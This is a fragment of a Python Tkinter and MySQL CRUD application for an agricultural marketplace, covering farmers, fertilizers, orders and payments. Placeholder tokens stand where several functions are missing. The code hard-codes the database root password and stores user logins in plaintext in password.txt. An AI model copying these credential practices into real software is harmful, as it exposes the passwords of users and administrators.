        err = Label(root, text='Invalid Company Id', font=('times new roman', 15))
        err.place(x=100, y=300)
        search_company()
def fertilizer():
    """Fertilizer screen: CRUD toolbar plus the fertilizer table view."""
    global root
    backdrop = Label(root, text=' ' * 800, font=('Times new roman', 500), bg='tomato')
    backdrop.place(x=0, y=0)
    title = Label(root, text='Fertilizer Table', font=('Times new roman', 15), bg='white')
    title.place(x=350, y=10)
    toolbar = [('Back', entity_page), ('Insert', insert_fer),
               ('Delete', delete_fer), ('Update', update_fer),
               ('Search', search_fer)]
    for offset, (caption, callback) in enumerate(toolbar):
        btn = tk.Button(root, text=caption, font=('Arial', 15), command=callback)
        btn.place(x=10 + 100 * offset, y=50)
    view_fer()
def view_fer():
    """Render every fertilizer row in a scrollable Treeview inside a bordered frame."""
    frame = Frame(root, bd=5, relief=RIDGE, bg='tomato')
    frame.place(x=10, y=100, width=750, height=400)
    x_scroll = Scrollbar(frame, orient=HORIZONTAL)
    y_scroll = Scrollbar(frame, orient=VERTICAL)
    columns = ('fe_formula', 'fe_name', 'fe_content', 'fe_price', 'company_id')
    table = ttk.Treeview(frame, columns=columns,
                         xscrollcommand=x_scroll.set, yscrollcommand=y_scroll.set)
    x_scroll.pack(side=BOTTOM, fill=X)
    y_scroll.pack(side=RIGHT, fill=Y)
    x_scroll.config(command=table.xview)
    y_scroll.config(command=table.yview)
    headings = {'fe_formula': 'Fertilizer Formula', 'fe_name': 'Fertilizer name',
                'fe_content': 'Fertilizer content', 'fe_price': 'Fertilizer price',
                'company_id': 'Company_id'}
    for column, caption in headings.items():
        table.heading(column, text=caption)
    table['show'] = 'headings'
    table.pack()
    cur.execute('SELECT * FROM fertilizer;')
    rows = cur.fetchall()
    db.commit()
    for row in rows:
        table.insert('', END, values=row)
<|reserved_special_token_0|>
def insert_fer_command():
    """Insert the fertilizer form (entries e1..e5); redisplay the form on error."""
    try:
        values = e1.get(), e2.get(), e3.get(), e4.get(), e5.get()
        cur.executemany('INSERT INTO fertilizer values(%s,%s,%s,%s,%s);', [values])
        db.commit()
        fertilizer()
    except:
        insert_fer()
def delete_fer():
    """Prompt for a fertilizer formula with Back/Commit actions for deletion."""
    global e1
    backdrop = Label(root, text=' ' * 800, font=('Times new roman', 500), bg='tomato')
    backdrop.place(x=0, y=0)
    prompt = Label(root, text='Fertilizer formula:', font=('Times new roman', 20), bg='tomato')
    prompt.place(x=100, y=200)
    e1 = Entry(root, width=50)
    e1.place(x=300, y=200)
    back_btn = tk.Button(root, text='Back', font=('Arial', 15), command=fertilizer)
    back_btn.place(x=200, y=400)
    commit_btn = tk.Button(root, text='Commit', font=('Arial', 15),
                           command=delete_fer_command)
    commit_btn.place(x=400, y=400)
def delete_fer_command():
    """Delete the fertilizer whose formula is in e1; show an error label on failure."""
    try:
        cur.execute('DELETE FROM fertilizer WHERE fe_formula=%s;', [e1.get()])
        db.commit()
        fertilizer()
    except:
        err = Label(root, text='Invalid Entry', font=('times new roman', 15))
        err.place(x=100, y=300)
def update_fer():
    """Ask for the fertilizer formula to edit, then hand off to update_fe()."""
    global e1
    backdrop = Label(root, text=' ' * 800, font=('Times new roman', 500), bg='tomato')
    backdrop.place(x=0, y=0)
    prompt = Label(root, text='Fertlizer formula:', font=('Times new roman', 20), bg='tomato')
    prompt.place(x=100, y=200)
    e1 = Entry(root, width=50)
    e1.place(x=300, y=200)
    ok_btn = tk.Button(root, text='OK', font=('Arial', 15), command=update_fe)
    ok_btn.place(x=300, y=400)
def update_fe():
    """Load the selected fertilizer row (5 columns) into editable fields.

    Bug fixes: the entry list previously included a stale global ``e6``
    (the fertilizer table has only five columns), so the function raised
    NameError — masked by the bare except — whenever ``e6`` had never been
    created; and the failure message said 'Invalid Farmer_id' instead of
    naming the fertilizer formula.  (Label typos 'Fertlizer'/'comapny_id'
    are preserved as-is.)
    """
    try:
        global e1, e2, e3, e4, e5
        backdrop = Label(root, text=' ' * 800, font=('Times new roman', 500), bg='tomato')
        backdrop.place(x=0, y=0)
        cur.execute('SELECT * FROM fertilizer WHERE fe_formula=%s;', [e1.get()])
        captions = ['Fertlizer formula', 'Fertlizer name', 'Fertlizer content',
                    'Fertlizer price', 'comapny_id']
        rows_y = [10, 60, 110, 160, 210]
        for caption, y in zip(captions, rows_y):
            lbl = Label(root, text=caption, font=('Times new roman', 20), bg='white')
            lbl.place(x=50, y=y)
        e1, e2, e3, e4, e5 = (Entry(root) for _ in range(5))
        fields = [e1, e2, e3, e4, e5]  # exactly the five table columns
        # IndexError (-> except branch) when the formula matched no row.
        row = cur.fetchall()[0]
        for field, value in zip(fields, row):
            field.insert(0, value)
        for field, y in zip(fields, rows_y):
            field.place(x=350, y=y)
        modify = Button(root, text='Modify', font=('Times new roman', 20),
                        bg='blue', command=update_command_fe)
        modify.place(x=300, y=400)
    except:
        err = Label(root, text='Invalid Fertilizer formula', font=('times new roman', 15))
        err.place(x=100, y=300)
        update_fer()
<|reserved_special_token_0|>
def search_fer():
    """Prompt for a fertilizer formula with Back/Search actions."""
    global e1
    backdrop = Label(root, text=' ' * 800, font=('Times new roman', 500), bg='tomato')
    backdrop.place(x=0, y=0)
    prompt = Label(root, text='Fertlizer formula:', font=('Times new roman', 20), bg='tomato')
    prompt.place(x=100, y=200)
    e1 = Entry(root, width=50)
    e1.place(x=300, y=200)
    back_btn = tk.Button(root, text='Back', font=('Arial', 15), command=fertilizer)
    back_btn.place(x=200, y=400)
    search_btn = tk.Button(root, text='Search', font=('Arial', 15), command=search_fe)
    search_btn.place(x=400, y=400)
def search_fe():
    """Look up one fertilizer by formula and print each column as a labelled line."""
    backdrop = Label(root, text=' ' * 800, font=('Times new roman', 500), bg='tomato')
    backdrop.place(x=0, y=0)
    try:
        cur.execute('SELECT * FROM fertilizer WHERE fe_formula=%s;', [e1.get()])
        ok_btn = tk.Button(root, text='OK', font=('Arial', 15), command=fertilizer)
        ok_btn.place(x=300, y=400)
        names = ['fertilizer formula: ', 'fertilizer name: ',
                 'fertilizer content: ', 'fertilizer price: ', 'company_id: ']
        for record in cur:
            for offset, (caption, value) in enumerate(zip(names, record)):
                line = Label(root, text=caption + str(value),
                             font=('Times new roman', 20), bg='tomato')
                line.place(x=10, y=50 + 50 * offset)
        db.commit()
    except:
        err = Label(root, text='Invalid Fertilizer formula', font=(
            'times new roman', 15))
        err.place(x=100, y=300)
        search_fer()
def orders():
    """Orders screen: CRUD toolbar plus the orders table view."""
    global root
    backdrop = Label(root, text=' ' * 800, font=('Times new roman', 500), bg='tomato')
    backdrop.place(x=0, y=0)
    title = Label(root, text='Orders Table', font=('Times new roman', 15), bg='white')
    title.place(x=350, y=10)
    toolbar = [('Back', entity_page), ('Insert', insert_ord),
               ('Delete', delete_ord), ('Update', update_ord),
               ('Search', search_ord)]
    for offset, (caption, callback) in enumerate(toolbar):
        btn = tk.Button(root, text=caption, font=('Arial', 15), command=callback)
        btn.place(x=10 + 100 * offset, y=50)
    view_ord()
def view_ord():
    """Render every order row in a scrollable Treeview inside a bordered frame."""
    frame = Frame(root, bd=5, relief=RIDGE, bg='tomato')
    frame.place(x=10, y=100, width=750, height=400)
    x_scroll = Scrollbar(frame, orient=HORIZONTAL)
    y_scroll = Scrollbar(frame, orient=VERTICAL)
    columns = ('or_id', 'or_date', 'or_fid', 'or_formula', 'or_to')
    table = ttk.Treeview(frame, columns=columns,
                         xscrollcommand=x_scroll.set, yscrollcommand=y_scroll.set)
    x_scroll.pack(side=BOTTOM, fill=X)
    y_scroll.pack(side=RIGHT, fill=Y)
    x_scroll.config(command=table.xview)
    y_scroll.config(command=table.yview)
    headings = {'or_id': 'Order Id', 'or_date': 'Order Date',
                'or_fid': 'Ordered Farmer Id', 'or_formula': 'Order (item)formula',
                'or_to': 'Order to'}
    for column, caption in headings.items():
        table.heading(column, text=caption)
    table['show'] = 'headings'
    table.pack()
    cur.execute('SELECT * FROM orders;')
    rows = cur.fetchall()
    db.commit()
    for row in rows:
        table.insert('', END, values=row)
<|reserved_special_token_0|>
def insert_ord():
    """Blank five-field form for a new order; the date field defaults to now."""
    global e1, e2, e3, e4, e5, e6
    backdrop = Label(root, text=' ' * 800, font=('Times new roman', 500), bg='tomato')
    backdrop.place(x=0, y=0)
    captions = ['Order Id', 'Order date', 'Order FID', 'Order formula', 'Order to']
    rows_y = [10, 60, 110, 160, 210]
    for caption, y in zip(captions, rows_y):
        lbl = Label(root, text=caption, font=('Times new roman', 20), bg='white')
        lbl.place(x=50, y=y)
    e1, e2, e3, e4, e5 = (Entry(root, width=50) for _ in range(5))
    for field, y in zip((e1, e2, e3, e4, e5), rows_y):
        field.place(x=350, y=y)
    # Pre-fill the order date with the current timestamp.
    e2.insert(0, datetime.now())
    back = tk.Button(root, text='Back', font=('Arial', 15), command=orders)
    back.place(x=200, y=400)
    commit = tk.Button(root, text='Commit', font=('Arial', 15), command=insert_ord_command)
    commit.place(x=400, y=400)
def insert_ord_command():
    """Insert the order form (entries e1..e5); redisplay the form on error."""
    try:
        values = e1.get(), e2.get(), e3.get(), e4.get(), e5.get()
        cur.executemany('INSERT INTO orders values(%s,%s,%s,%s,%s);', [values])
        db.commit()
        orders()
    except:
        insert_ord()
def delete_ord():
    """Prompt for an order id with Back/Commit actions for deletion."""
    global e1
    backdrop = Label(root, text=' ' * 800, font=('Times new roman', 500), bg='tomato')
    backdrop.place(x=0, y=0)
    prompt = Label(root, text='Order Id:', font=('Times new roman', 20), bg='tomato')
    prompt.place(x=100, y=200)
    e1 = Entry(root, width=50)
    e1.place(x=300, y=200)
    back_btn = tk.Button(root, text='Back', font=('Arial', 15), command=orders)
    back_btn.place(x=200, y=400)
    commit_btn = tk.Button(root, text='Commit', font=('Arial', 15),
                           command=delete_ord_command)
    commit_btn.place(x=400, y=400)
def delete_ord_command():
    """Delete the order whose id is in e1; show an error label on failure."""
    try:
        cur.execute('DELETE FROM orders WHERE or_id=%s;', [e1.get()])
        db.commit()
        orders()
    except:
        err = Label(root, text='Invalid Entry', font=('times new roman', 15))
        err.place(x=100, y=300)
def update_ord():
    """Ask for the order id to edit, then hand off to update_or()."""
    global e1
    backdrop = Label(root, text=' ' * 800, font=('Times new roman', 500), bg='tomato')
    backdrop.place(x=0, y=0)
    prompt = Label(root, text='Order Id:', font=('Times new roman', 20), bg='tomato')
    prompt.place(x=100, y=200)
    e1 = Entry(root, width=50)
    e1.place(x=300, y=200)
    ok_btn = tk.Button(root, text='OK', font=('Arial', 15), command=update_or)
    ok_btn.place(x=300, y=400)
def update_or():
    """Load the selected order row (5 columns) into editable fields.

    Bug fix: the entry list previously included a stale global ``e6`` (the
    orders table has only five columns), which raised NameError — masked by
    the bare except — whenever ``e6`` had never been created.
    """
    try:
        global e1, e2, e3, e4, e5
        backdrop = Label(root, text=' ' * 800, font=('Times new roman', 500), bg='tomato')
        backdrop.place(x=0, y=0)
        cur.execute('SELECT * FROM orders WHERE or_id=%s;', [e1.get()])
        captions = ['Order Id', 'Order Date', 'Order f_id', 'Order formula', 'Order to']
        rows_y = [10, 60, 110, 160, 210]
        for caption, y in zip(captions, rows_y):
            lbl = Label(root, text=caption, font=('Times new roman', 20), bg='white')
            lbl.place(x=50, y=y)
        e1, e2, e3, e4, e5 = (Entry(root) for _ in range(5))
        fields = [e1, e2, e3, e4, e5]  # exactly the five table columns
        # IndexError (-> except branch) when the id matched no row.
        row = cur.fetchall()[0]
        for field, value in zip(fields, row):
            field.insert(0, value)
        for field, y in zip(fields, rows_y):
            field.place(x=350, y=y)
        modify = Button(root, text='Modify', font=('Times new roman', 20),
                        bg='blue', command=update_command_ord)
        modify.place(x=300, y=400)
    except:
        err = Label(root, text='Invalid Order_id', font=('times new roman', 15))
        err.place(x=100, y=300)
        update_ord()
def update_command_ord():
    """Persist the edited order row (entries e1..e5) back to the orders table.

    Improvements: uses ``execute`` for the single row instead of
    ``executemany``, and — consistent with the farmer screen's
    update_command() — traps DB errors instead of crashing the GUI,
    returning the user to the order-id prompt.
    """
    try:
        sql = (
            'UPDATE orders SET or_date=%s,or_fid=%s,or_formula=%s,or_to=%s WHERE or_id=%s;'
            )
        vals = e2.get(), e3.get(), e4.get(), e5.get(), e1.get()
        cur.execute(sql, vals)
        db.commit()
        orders()
    except:
        update_ord()
def search_ord():
    """Prompt for an order id with Back/Search actions."""
    global e1
    backdrop = Label(root, text=' ' * 800, font=('Times new roman', 500), bg='tomato')
    backdrop.place(x=0, y=0)
    prompt = Label(root, text='Order Id:', font=('Times new roman', 20), bg='tomato')
    prompt.place(x=100, y=200)
    e1 = Entry(root, width=50)
    e1.place(x=300, y=200)
    back_btn = tk.Button(root, text='Back', font=('Arial', 15), command=orders)
    back_btn.place(x=200, y=400)
    search_btn = tk.Button(root, text='Search', font=('Arial', 15), command=search_or)
    search_btn.place(x=400, y=400)
def search_or():
    """Look up one order by id and print each column as a labelled line."""
    backdrop = Label(root, text=' ' * 800, font=('Times new roman', 500), bg='tomato')
    backdrop.place(x=0, y=0)
    try:
        cur.execute('SELECT * FROM orders WHERE or_id=%s;', [e1.get()])
        ok_btn = tk.Button(root, text='OK', font=('Arial', 15), command=orders)
        ok_btn.place(x=300, y=400)
        names = ['order Id: ', 'Order date: ', 'Order fid: ',
                 'Order formula: ', 'order to: ']
        for record in cur:
            for offset, (caption, value) in enumerate(zip(names, record)):
                line = Label(root, text=caption + str(value),
                             font=('Times new roman', 20), bg='tomato')
                line.place(x=10, y=50 + 50 * offset)
        db.commit()
    except:
        err = Label(root, text='Invalid order id', font=('times new roman', 15))
        err.place(x=100, y=300)
        search_ord()
def payment():
    """Payment screen: CRUD toolbar plus the payment table view."""
    global root
    backdrop = Label(root, text=' ' * 800, font=('Times new roman', 500), bg='tomato')
    backdrop.place(x=0, y=0)
    title = Label(root, text='Payment Table', font=('Times new roman', 15), bg='white')
    title.place(x=350, y=10)
    toolbar = [('Back', entity_page), ('Insert', insert_pay),
               ('Delete', delete_pay), ('Update', update_pay),
               ('Search', search_pay)]
    for offset, (caption, callback) in enumerate(toolbar):
        btn = tk.Button(root, text=caption, font=('Arial', 15), command=callback)
        btn.place(x=10 + 100 * offset, y=50)
    view_pay()
def view_pay():
    """Render every payment row in a scrollable Treeview inside a bordered frame."""
    frame = Frame(root, bd=5, relief=RIDGE, bg='tomato')
    frame.place(x=10, y=100, width=750, height=400)
    x_scroll = Scrollbar(frame, orient=HORIZONTAL)
    y_scroll = Scrollbar(frame, orient=VERTICAL)
    columns = ('trans_id', 'p_f_id', 'p_date', 'p_amount', 'p_method')
    table = ttk.Treeview(frame, columns=columns,
                         xscrollcommand=x_scroll.set, yscrollcommand=y_scroll.set)
    x_scroll.pack(side=BOTTOM, fill=X)
    y_scroll.pack(side=RIGHT, fill=Y)
    x_scroll.config(command=table.xview)
    y_scroll.config(command=table.yview)
    headings = {'trans_id': 'Transaction Id', 'p_f_id': 'Farmer Id',
                'p_date': 'Payment Date', 'p_amount': 'Amount',
                'p_method': 'Payment Method'}
    for column, caption in headings.items():
        table.heading(column, text=caption)
    table['show'] = 'headings'
    table.pack()
    cur.execute('SELECT * FROM payment;')
    rows = cur.fetchall()
    db.commit()
    for row in rows:
        table.insert('', END, values=row)
<|reserved_special_token_0|>
def insert_pay():
    """Render the payment insertion form; Commit runs insert_pay_command.

    e1..e4 are text entries; e5 is the StringVar behind the payment-method
    OptionMenu, so insert_pay_command can read all five via .get().
    """
    global e1, e2, e3, e4, e5, e6
    # Blank out the previous page.
    Label(root, text=' ' * 800, font=('Times new roman', 500), bg='tomato'
          ).place(x=0, y=0)
    captions = ['Transaction Id', 'Transaction farmer id', 'Transaction date',
                'Transaction amount', 'Transaction method']
    ys = [10, 60, 110, 160, 210]
    for caption, y in zip(captions, ys):
        Label(root, text=caption, font=('Times new roman', 20), bg='white'
              ).place(x=50, y=y)
    e1 = Entry(root, width=50)
    e2 = Entry(root, width=50)
    e3 = Entry(root, width=50)
    e4 = Entry(root, width=50)
    e1.place(x=350, y=10)
    e2.place(x=350, y=60)
    e3.place(x=350, y=110)
    e3.insert(0, datetime.now())  # pre-fill the date field with "now"
    e4.place(x=350, y=160)
    # BUG FIX: an unused Entry used to be bound to e5 right before this
    # StringVar (dead widget), and the default 'Debit card' was missing from
    # the menu choices, so once the user picked another method the default
    # could never be selected again.
    e5 = StringVar(root)
    e5.set('Debit card')
    w = OptionMenu(root, e5, 'Debit card', 'Credit Card', 'UPI', 'Cheque',
                   'Cash')
    w.place(x=350, y=210)
    tk.Button(root, text='Back', font=('Arial', 15), command=payment
              ).place(x=200, y=400)
    tk.Button(root, text='Commit', font=('Arial', 15),
              command=insert_pay_command).place(x=400, y=400)
def insert_pay_command():
    """Insert the payment row assembled from form entries e1..e5."""
    try:
        sql = 'INSERT INTO payment values(%s,%s,%s,%s,%s);'
        vals = e1.get(), e2.get(), e3.get(), e4.get(), e5.get()
        # Single row: execute() is the right call; executemany was overkill.
        cur.execute(sql, vals)
        db.commit()
        payment()
    except Exception:
        # Narrowed from a bare except so KeyboardInterrupt/SystemExit still
        # propagate; any DB/form error returns the user to the blank form.
        insert_pay()
def delete_pay():
    """Ask for a transaction id to delete; Commit runs delete_pay_command."""
    global e1
    Label(root, text=' ' * 800, font=('Times new roman', 500), bg='tomato'
          ).place(x=0, y=0)
    Label(root, text='Transaction Id:', font=('Times new roman', 20),
          bg='tomato').place(x=100, y=200)
    e1 = Entry(root, width=50)
    e1.place(x=300, y=200)
    tk.Button(root, text='Back', font=('Arial', 15), command=payment
              ).place(x=200, y=400)
    tk.Button(root, text='Commit', font=('Arial', 15),
              command=delete_pay_command).place(x=400, y=400)
def delete_pay_command():
    """Delete the payment whose trans_id was typed in delete_pay()."""
    try:
        sql = 'DELETE FROM payment WHERE trans_id=%s;'
        cur.execute(sql, [e1.get()])
        db.commit()
        payment()
    except Exception:
        # Narrowed from a bare except; show an inline error instead of crashing.
        l = Label(root, text='Invalid Entry', font=('times new roman', 15))
        l.place(x=100, y=300)
<|reserved_special_token_0|>
def search_pay():
    """Ask for a transaction id to look up; Search runs search_pa."""
    global e1
    Label(root, text=' ' * 800, font=('Times new roman', 500), bg='tomato'
          ).place(x=0, y=0)
    Label(root, text='Transaction Id:', font=('Times new roman', 20),
          bg='tomato').place(x=100, y=200)
    e1 = Entry(root, width=50)
    e1.place(x=300, y=200)
    tk.Button(root, text='Back', font=('Arial', 15), command=payment
              ).place(x=200, y=400)
    tk.Button(root, text='Search', font=('Arial', 15), command=search_pa
              ).place(x=400, y=400)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def First_page(root):
    """Draw the login screen: username/password fields plus LogIn/Register."""
    global T1, T2, T3
    Frame(root, height=500, width=800, bg='ivory').pack()
    Label(root, text='WELCOME TO AGRI MARKET', font=('Times new roman', 25)
          ).place(x=200, y=50)
    Button(root, text='LogIn', font=('times new roman', 20),
           command=check_pass, bg='green').place(x=350, y=350)
    tk.Label(root, text='Username', font=('Arial Bold', 15), bg='ivory'
             ).place(x=150, y=200)
    T1 = tk.Entry(root, width=30, bd=5)
    T1.place(x=280, y=200)
    tk.Label(root, text='Password', font=('Arial Bold', 15), bg='ivory'
             ).place(x=150, y=250)
    T2 = tk.Entry(root, width=30, show='*', bd=5)
    T2.place(x=280, y=250)
    Button(root, text='Register', font=('Arial Bold', 15), bg='blue',
           command=create_pass).place(x=340, y=400)
def check_pass():
    """Validate the login form against password.txt (one 'user=pass' per line)."""
    global root, T1, T2, T3
    try:
        with open('password.txt', 'r') as f:
            credentials = f.read().splitlines()
        # BUG FIX: the original used a substring test against the whole file,
        # so e.g. user 'a' / pass 'b' matched a stored line 'aa=bb'. Compare
        # against whole lines instead.
        if T1.get() and T2.get() and (T1.get() + '=' + T2.get()) in credentials:
            entity_page()
        else:
            label = Label(root, text=
                'Invalid username or password.Try again', font=(
                'times new roman', 15))
            label.place(x=200, y=100)
    except OSError:
        # Missing/unreadable password file: treat as a failed login.
        label = Label(root, text='Invalid username or password.Try again',
            font=('times new roman', 15))
        label.place(x=200, y=100)
def create_pass():
    """Registration form: username, password, confirmation; Done -> add_pass."""
    global root, T1, T2, T3
    Label(root, text=' ' * 800, font=('Times new roman', 500), bg='ivory'
          ).place(x=0, y=0)
    tk.Label(root, text='Username', font=('Arial Bold', 15), bg='ivory'
             ).place(x=150, y=200)
    T1 = tk.Entry(root, width=30, bd=5)
    T1.place(x=380, y=200)
    tk.Label(root, text='Password', font=('Arial Bold', 15), bg='ivory'
             ).place(x=150, y=250)
    T2 = tk.Entry(root, width=30, show='*', bd=5)
    T2.place(x=380, y=250)
    tk.Label(root, text='Confirm Password', font=('Arial Bold', 15),
             bg='ivory').place(x=150, y=300)
    T3 = tk.Entry(root, width=30, show='*', bd=5)
    T3.place(x=380, y=300)
    Button(root, text='Done', font=('Arial Bold', 15), bg='blue',
           command=add_pass).place(x=440, y=400)
def add_pass():
    """Append the new 'user=pass' credential line to password.txt.

    Shows an error if the password and its confirmation differ; otherwise
    stores the credential and moves on to the entity page.
    """
    global root, T1, T2, T3
    if T2.get() != T3.get():
        label = Label(root, text='Incorrect Password. Enter again', font=(
            'times new roman', 20))
        label.place(x=100, y=100)
    else:
        # BUG FIX: the old bare except treated ANY failure in the read-write
        # sequence as "file missing" and rewrote password.txt with only the
        # new credential, silently destroying existing accounts. Only a
        # genuinely missing file should take the fresh-file path.
        try:
            with open('password.txt', 'r') as f:
                data = f.read()
        except FileNotFoundError:
            data = None
        with open('password.txt', 'w') as f:
            if data is not None:
                f.write(data + '\n')
            f.write(T1.get() + '=' + T2.get())
        entity_page()
def entity_page():
    """Main menu: one button per entity table, plus the booking history."""
    global root
    Label(root, text=' ' * 800, font=('Times new roman', 500), bg='ivory'
          ).place(x=0, y=0)
    Label(root, text='WELCOME TO AGRI MARKET ', font=('Times new roman', 20),
          bg='blue').place(x=200, y=20)
    Label(root, text='Choose the Entity ', font=('Times new roman', 20),
          bg='white').place(x=250, y=100)
    # (caption, click handler, x, y) for every navigation button.
    choices = [('Farmers', farmer, 100, 175),
               ('Company', company, 300, 175),
               ('Fertilizer', fertilizer, 500, 175),
               ('Order', orders, 200, 325),
               ('Payment', payment, 400, 325),
               ('GET BOOKING HISTORY', history, 200, 425)]
    for caption, handler, x, y in choices:
        tk.Button(root, text=caption, font=('Arial', 15), command=handler
                  ).place(x=x, y=y)
def history():
    """List this month's payment transactions via the getMonth stored procedure."""
    global root, cur, db
    Label(root, text=' ' * 800, font=('Times new roman', 500), bg='tomato'
          ).place(x=0, y=0)
    cur.execute('CALL getMonth(%s);', [datetime.today().strftime('%m')])
    data = cur.fetchall()
    Label(root, text='The Transaction History of this month',
          font=('Arial', 15)).place(x=200, y=20)
    Button(root, text='BACK', command=entity_page).place(x=20, y=20)
    frame = Frame(root, bd=5, relief=RIDGE, bg='tomato')
    frame.place(x=10, y=100, width=750, height=400)
    x_scroll = Scrollbar(frame, orient=HORIZONTAL)
    y_scroll = Scrollbar(frame, orient=VERTICAL)
    table = ttk.Treeview(frame, columns=('trans_id', 'p_f_id', 'p_date',
        'p_amount', 'p_method'), xscrollcommand=x_scroll.set,
        yscrollcommand=y_scroll.set)
    x_scroll.pack(side=BOTTOM, fill=X)
    y_scroll.pack(side=RIGHT, fill=Y)
    x_scroll.config(command=table.xview)
    y_scroll.config(command=table.yview)
    for cid, title in (('trans_id', 'Transaction Id'), ('p_f_id', 'Farmer Id'),
                       ('p_date', 'Payment Date'), ('p_amount', 'Amount'),
                       ('p_method', 'Payment Method')):
        table.heading(cid, text=title)
    table['show'] = 'headings'
    table.pack()
    for row in data:
        table.insert('', END, values=row)
    # BUG FIX: the original closed the shared connection here and never
    # reopened it, so every query after visiting this page failed. Recycle
    # the module-level db/cur instead of leaving them dead.
    db.close()
    db = mysql.connector.connect(host='localhost', user='root', passwd=
        'bhushi', database='farmer_app')
    cur = db.cursor()
# Module-wide MySQL connection and cursor shared by every CRUD handler below.
# NOTE(review): credentials and host are hard-coded here; presumably a local
# 'farmer_app' schema must already exist — confirm before deployment.
db = mysql.connector.connect(host='localhost', user='root', passwd=
    'bhushi', database='farmer_app')
cur = db.cursor()
def farmer():
    """Render the Farmer page: a CRUD toolbar plus the farmers table."""
    global root
    Label(root, text=' ' * 800, font=('Times new roman', 500), bg='tomato'
          ).place(x=0, y=0)
    Label(root, text='Farmer Table', font=('Times new roman', 15), bg='white'
          ).place(x=350, y=10)
    # One toolbar button per action, 100px apart.
    actions = [('Back', entity_page), ('Insert', insert_farmer),
               ('Delete', delete_farmer), ('Update', update_farmer),
               ('Search', search_farmer)]
    for offset, (caption, handler) in enumerate(actions):
        tk.Button(root, text=caption, font=('Arial', 15), command=handler
                  ).place(x=10 + 100 * offset, y=50)
    view_farmer()
def view_farmer():
    """Fill a scrollable Treeview with every row of the farmer table."""
    container = Frame(root, bd=5, relief=RIDGE, bg='tomato')
    container.place(x=10, y=100, width=750, height=400)
    h_bar = Scrollbar(container, orient=HORIZONTAL)
    v_bar = Scrollbar(container, orient=VERTICAL)
    columns = (('f_id', 'Farmer Id'), ('f_name', 'Farmer Name'),
               ('f_phone', 'Farmer Phone'), ('f_mail', 'Farmer Mail'),
               ('f_locality', 'Farmer Locality'), ('f_address',
               'Farmer Address'))
    grid = ttk.Treeview(container, columns=tuple(cid for cid, _ in columns),
                        xscrollcommand=h_bar.set, yscrollcommand=v_bar.set)
    h_bar.pack(side=BOTTOM, fill=X)
    v_bar.pack(side=RIGHT, fill=Y)
    h_bar.config(command=grid.xview)
    v_bar.config(command=grid.yview)
    for cid, title in columns:
        grid.heading(cid, text=title)
    grid['show'] = 'headings'
    grid.column('f_id', width=100)  # narrow id column
    grid.pack()
    cur.execute('SELECT * FROM farmer;')
    rows = cur.fetchall()
    db.commit()
    for row in rows:
        grid.insert('', END, values=row)
<|reserved_special_token_0|>
def insert_farmer():
    """Render the blank farmer form; entries e1..e6 feed insert_farmer_command."""
    global e1, e2, e3, e4, e5, e6
    Label(root, text=' ' * 800, font=('Times new roman', 500), bg='tomato'
          ).place(x=0, y=0)
    captions = ['Farmer_id', 'Farmer_name', 'Farmer_phone', 'Farmer_mail',
                'Farmer_locality', 'Farmer_address']
    ys = [10, 60, 110, 160, 210, 270]
    for caption, y in zip(captions, ys):
        Label(root, text=caption, font=('Times new roman', 20), bg='white'
              ).place(x=50, y=y)
    e1, e2, e3, e4, e5, e6 = (Entry(root, width=50) for _ in range(6))
    for entry, y in zip((e1, e2, e3, e4, e5, e6), ys):
        entry.place(x=350, y=y)
    tk.Button(root, text='Back', font=('Arial', 15), command=farmer
              ).place(x=200, y=400)
    tk.Button(root, text='Commit', font=('Arial', 15),
              command=insert_farmer_command).place(x=400, y=400)
def insert_farmer_command():
    """Validate and insert the farmer row built from form entries e1..e6."""
    global root
    try:
        sql = 'INSERT INTO farmer values(%s,%s,%s,%s,%s,%s);'
        if len(e1.get()) > 3:
            # Ids longer than 3 characters are rejected via the invalid() page.
            invalid('farmer')
        else:
            vals = e1.get(), e2.get(), e3.get(), e4.get(), e5.get(), e6.get()
            # Single row: execute() replaces the needless executemany().
            cur.execute(sql, vals)
            db.commit()
            farmer()
    except Exception:
        # Narrowed from a bare except; DB/form errors return to the blank form.
        insert_farmer()
def invalid(page):
    """Show a validation-error page for a too-long id and offer re-entry.

    `page` selects which entity's message and re-entry form are used.
    """
    Label(root, text=' ' * 800, font=('Times new roman', 500), bg='tomato'
          ).place(x=0, y=0)
    prompts = {'farmer': ('Enter valid farmer_id', insert_farmer),
               'company': ('Enter valid company_id', insert_company)}
    if page in prompts:
        message, retry = prompts[page]
        Label(root, text=message, font=('Times new roman', 30), bg='white'
              ).place(x=170, y=200)
        Button(root, text='Re-enter', font=('Times new roman', 20),
               command=retry).place(x=300, y=400)
<|reserved_special_token_0|>
def delete_farmer_command():
    """Delete the farmer whose f_id was typed in the delete form."""
    try:
        sql = 'DELETE FROM farmer WHERE f_id=%s;'
        cur.execute(sql, [e1.get()])
        db.commit()
        farmer()
    except Exception:
        # Narrowed from a bare except; show an inline error instead of crashing.
        l = Label(root, text='Invalid Entry', font=('times new roman', 15))
        l.place(x=100, y=300)
def update_farmer():
    """Prompt for the farmer id to edit; OK hands off to update()."""
    global e1
    Label(root, text=' ' * 800, font=('Times new roman', 500), bg='tomato'
          ).place(x=0, y=0)
    Label(root, text='Farmer Id:', font=('Times new roman', 20), bg='tomato'
          ).place(x=100, y=200)
    e1 = Entry(root, width=50)
    e1.place(x=300, y=200)
    tk.Button(root, text='OK', font=('Arial', 15), command=update
              ).place(x=300, y=400)
def update():
    """Load the farmer picked in update_farmer() into an editable form.

    Fetches the row for the id in e1, rebinds e1..e6 to fresh entries
    pre-filled with the row's values, and wires Modify to update_command.
    """
    try:
        global e1, e2, e3, e4, e5, e6
        Label(root, text=' ' * 800, font=('Times new roman', 500), bg='tomato'
              ).place(x=0, y=0)
        cur.execute('SELECT * FROM farmer WHERE f_id=%s;', [e1.get()])
        captions = ['Farmer_id', 'Farmer_name', 'Farmer_phone', 'Farmer_mail',
                    'Farmer_locality', 'Farmer_address']
        ys = [10, 60, 110, 160, 210, 270]
        for caption, y in zip(captions, ys):
            Label(root, text=caption, font=('Times new roman', 20), bg='white'
                  ).place(x=50, y=y)
        e1, e2, e3, e4, e5, e6 = (Entry(root) for _ in range(6))
        # IndexError here (no matching row) is handled below as an invalid id.
        row = cur.fetchall()[0]
        entries = (e1, e2, e3, e4, e5, e6)
        for entry, value in zip(entries, row):
            entry.insert(0, value)
        for entry, y in zip(entries, ys):
            entry.place(x=350, y=y)
        Button(root, text='Modify', font=('Times new roman', 20), bg='blue',
               command=update_command).place(x=300, y=400)
    except Exception:
        # Narrowed from a bare except; unknown ids return to the prompt.
